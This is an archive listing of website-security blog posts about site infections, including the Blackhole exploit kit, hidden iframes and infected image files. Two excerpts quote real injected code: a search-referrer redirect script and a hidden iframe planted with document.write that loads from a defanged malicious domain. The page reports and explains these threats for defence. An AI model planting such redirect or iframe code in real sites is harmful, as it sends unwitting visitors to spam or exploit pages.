Category: Javascript

VisitorTracker Malware – way beyond just JavaScript files

Over the past couple of weeks, we’ve seen a fairly new malware show up in sites. It doesn’t appear to be specific to any one type of cms or website which would point to some type of ‘other’ vulnerability such as a compromised FTP, cPanel or other unknown issue. We haven’t been able to track…
Read more


September 26, 2015 1

More Trouble For jQuery As Second Compromise Reported

The website for JavaScript library jQuery is under attack for the second time in a week.


September 24, 2014 0

Website Redirects using document.referrer

Towards the beginning of the year we saw several spam hacks that used an injected JavaScript redirect; it typically looks like the following: var s=document. referrer; if(s.indexOf(“google”)>0 || s.indexOf(“bing”)>0 || s.indexOf(“yahoo”)>0 || s.indexOf (“aol”)>0){ self.location=’http: // targetsite[.]com’; } When it appears on Windows based servers (which is what we saw several cases of just in…
Read more


April 15, 2014 0

Javascript Canvas and Compression used to hide iFrames

Last week, several blogs have posted about a “new iFrame injection method”, which really isn’t that new. Previous researchers warned everyone of the possibility of such an attach as far back as 2009. and there is a tool to show you how to embed data using the canvas element to compress and embed javascript in…
Read more


February 10, 2014 0

Website Malware spreading beyond just the basics, infected .jpg files

Our team has seen numerous sites over the past few weeks that have what seems to be a more sophisticated attack. It appears that malware is no longer limited to just your standard files such as asp, aspx, htm/html, javascript, php, etc. They have started inserting code in the headers of jpg files. We’ve seen…
Read more


August 29, 2013 0

Infected with the Blackhole Exploit kit?

Is your site infected with the Blackhole exploit kit? The Blackhole exploit kit is still a major threat to website owners. You usually don’t know you have it unless you visit your site and get a virus warning from your anti-virus software. It doesn’t matter if your site is static HTML, custom PHP, wordpress, joomla,…
Read more


August 14, 2013 0

Site hacked by Solt6n and or MeHdi God?

Recently, thousands of sites were compromised by Solt6n (Details available at: http://www.zone-h.org/archive/notifier=solt6n). It appears that this has been ongoing for months. We don’t currently have details of how the sites were compromised but it appears that it may just be due to weak credentials on sites. If you aren’t technical and you need immediate assistance,…
Read more


February 28, 2013 0

All JavaScript files infected – Blackhole Exploit kit

Are all your JavasScript files infected with the Blackhole Exploit Kit? Again, this was not specific to any particular Content Mangement System (CMS) or server type. It appeared on IIS servers as well as Apache, and it didn’t discriminate on what type of content you were hosting (php, html, aspx, asp,etc). In most cases, it…
Read more


January 8, 2013 0

Massive Iframe injection “nighttrend.cgi?8” from 78.157.192.72

It appears that in the last 24 hours, many people are reporting that sites are getting infected with iframes. One user reported that the following: document.write(‘ < iframe width="10" height="10" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://byiegfs[.]ddns[.]info/nighttrend.cgi?8">< / iframe> ‘); had been inserted into all their js files on their server. if you resolve the domain, you end up with…
Read more


December 11, 2012 1

Uebimiau Webmail 2.7.2 Stored XSS

Uebimiau Webmail 2.7.2 Stored XSS


August 20, 2012 0